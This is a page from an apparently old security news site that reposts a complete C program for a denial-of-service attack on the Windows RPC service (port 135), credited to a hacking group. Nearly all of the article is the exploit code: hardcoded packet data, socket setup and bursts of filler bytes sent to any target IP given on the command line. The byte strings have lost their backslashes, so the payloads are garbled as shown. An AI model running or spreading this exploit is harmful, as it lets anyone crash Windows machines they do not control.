Press CTRL-D to bookmark us
Welcome Guest Login / Register / Members
Search in  
Top Submit newsSubscribe
Communication | Computer Crime | Digital Audio, Video, Photo | General News | Hardware | Internet | Mobile | PDA | Security | Software | Vulnerability |
Previous articleBack to news listNext article
 

 Sponsored links

Want to become one of our authors and see your work published on ALLSeek.iNFO ?
 
 Windows RPC DoS Exploit Code (from SPIKE to C)
Categorie: Vulnerability
Posted: 2002-11-18 by ReCall
Views: 562
Source: Click here
 		Current Rating: Not rated
Poor Best
 Details
<b>Summary</b>

The following exploit code will allow you to test your server for the <a href="http://www.securiteam.com/windowsntfocus/6G00B2K5PM.html" target="_blank">Windows RPC DoS </a>vulnerability noted in our previous article: Windows RPC Service DoS (SPIKE).



<b> Details</b>

Exploit:





/*

************************************************************************

* MS WIN RPC DoS CODE FROM SPIKE v2.7

*

* Compile it use:

* cl winnuke.c

*

* Usage:

* winnuke targetip

*

* Code by lion, Welcomde to HUC Website Http://www.cnhonker.com

* 2002/10/22

************************************************************************

*/



#include <winsock2.h>

#include <stdio.h>



#pragma comment(lib, "ws2_32.lib")



char sendcode1[] =

"x05x00x0bx03x10x00x00x00x48x00x00x00x02x00x00x00"

"xd0x16xd0x16x00x00x00x00x01x00x00x00x00x00x01x00"

"x60x9exe7xb9x52x3dxcex11xaaxa1x00x00x69x01x29x3f"

"x02x00x02x00x04x5dx88x8axebx1cxc9x11x9fxe8x08x00"

"x2bx10x48x60x02x00x00x00x05x00x00x01x10x00x00x00"

"xd0x16x00x00x8fx00x00x00x20x27x01x00x00x00x02x00"

"xf0x00x00x00x00x00x00x00xf0x00x00x00";



char sendcode2[] =

"x88x13x00x00x00x00x00x00x88x13x00x00";



char sendcode3[] =

"xffxffxffxffxffxffxffxffx00x00x00x00x00x00x00x00"

"x00x00x00x00x00x02x00x00x00x00x00x00x00x02x00x00";



char sendcode4[] =

"xfexffx00x00x00x00x00x00xfexffx00x00x3dx3dx3dx3d"

"x3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3d"

"x05x00x00x00x10x00x00x00xd0x16x00x00x8fx00x00x00"

"x50x10x01x00x00x00x02x00";



char sendcode5[] =

"x05x00x00x00x10x00x00x00xd0x16x00x00x8fx00x00x00"

"x80xf9x00x00x00x00x02x00";



char sendcode6[] =

"x05x00x00x00x10x00x00x00xd0x16x00x00x8fx00x00x00"

"xb0xe2x00x00x00x00x02x00";



char sendcode7[] =

"x05x00x00x02x10x00x00x00x60x15x00x00x8fx00x00x00"

"x60x15x00x00x00x00x02x00";



char sendcode8[] =

"x00x00x01x10x00x00x00x00x00x00x01x10x00x00";



int main(int argc, char *argv[])

{

WSADATA wsaData;

WORD wVersionRequested;

struct hostent *pTarget;

struct sockaddr_in sock;

char *targetip;

int port,bufsize;

SOCKET s;

char buffer[20480];



printf("========================= HUC Win2000/XP RPC Nuke V0.10 =======================
");

printf("================= By Lion, Welcome to http://www.cnhonker.com =================

");



if (argc < 2)

{

printf("Usage:
");

printf(" %s <TargetIP> [TargetPort]
", argv[0]);

printf("Example:
");

printf(" %s 192.168.0.1
", argv[0]);

printf(" %s 192.168.0.1 135
", argv[0]);

printf("PS:
");

printf(" If target is XP, try 2 times.
");

exit(1);

}



wVersionRequested = MAKEWORD(1, 1);

if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1;



targetip = argv[1];

port = 135;

if (argc >= 3) port = atoi(argv[2]);

bufsize = 512;

if (argc >= 4) bufsize = atoi(argv[3]);



s = socket(AF_INET, SOCK_STREAM, 0);

if(s==INVALID_SOCKET)

{

printf("Socket error!
");

exit(1);

}



printf("Resolving Hostnames...
");

if ((pTarget = gethostbyname(targetip)) == NULL)

{

printf("Resolve of %s failed, please try again.
", argv[1]);

exit(1);

}



memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);

sock.sin_family = AF_INET;

sock.sin_port = htons((USHORT)port);



printf("Connecting...
");

if ( (connect(s, (struct sockaddr *)&sock, sizeof (sock) )))

{

printf("Couldn't connect to host.
");

exit(1);

}



printf("Connected!...
");

printf("Sending Packets...
");

if (send(s, sendcode1, sizeof(sendcode1)-1, 0) == -1)

{

printf("Error sending nuke Packets
");

closesocket(s);

exit(1);

}



memset(&buffer, 'x41', 240);

send(s, buffer, 240, 0);



send(s, sendcode2, sizeof(sendcode2)-1, 0);

memset(&buffer, 'x42', 5000);

send(s, buffer, 5000, 0);



send(s, sendcode3, sizeof(sendcode3)-1, 0);

memset(&buffer, 'x43', 512);

send(s, buffer, 512, 0);



send(s, sendcode4, sizeof(sendcode4)-1, 0);

// memset(&buffer, 'x44', 20480);

// send(s, buffer, 20480, 0);



// /*

memset(&buffer, 'x44', 5000);

send(s, buffer, 5000, 0);



send(s, sendcode5, sizeof(sendcode5)-1, 0);

memset(&buffer, 'x45', 5000);

send(s, buffer, 5000, 0);



send(s, sendcode6, sizeof(sendcode6)-1, 0);

memset(&buffer, 'x46', 5000);

send(s, buffer, 5000, 0);



send(s, sendcode7, sizeof(sendcode7)-1, 0);

memset(&buffer, 'x47', 5000);

send(s, buffer, 5000, 0);



send(s, sendcode8, sizeof(sendcode8)-1, 0);

memset(&buffer, 'x48', 5000);

send(s, buffer, 5000, 0);



// */

printf("Nuked!
If target is XP, try a again! :)
");

closesocket(s);

WSACleanup();

return 0;

}
 
Syndication
Permalink Email this

The URI to TrackBack this entry is:
http://allseek.info/news/trackback.php?id=326

User comments (post your comments here)

Only registerd members can post comments and articles
 
Previous articleBack to news listNext article
 


InterJOB.su
Bookmark us | Set As Homepage | Advertising | Contact Us | Recomend us | Link us | Links | Terms

SpyLOG Page Rank Checker
LAST QUERIES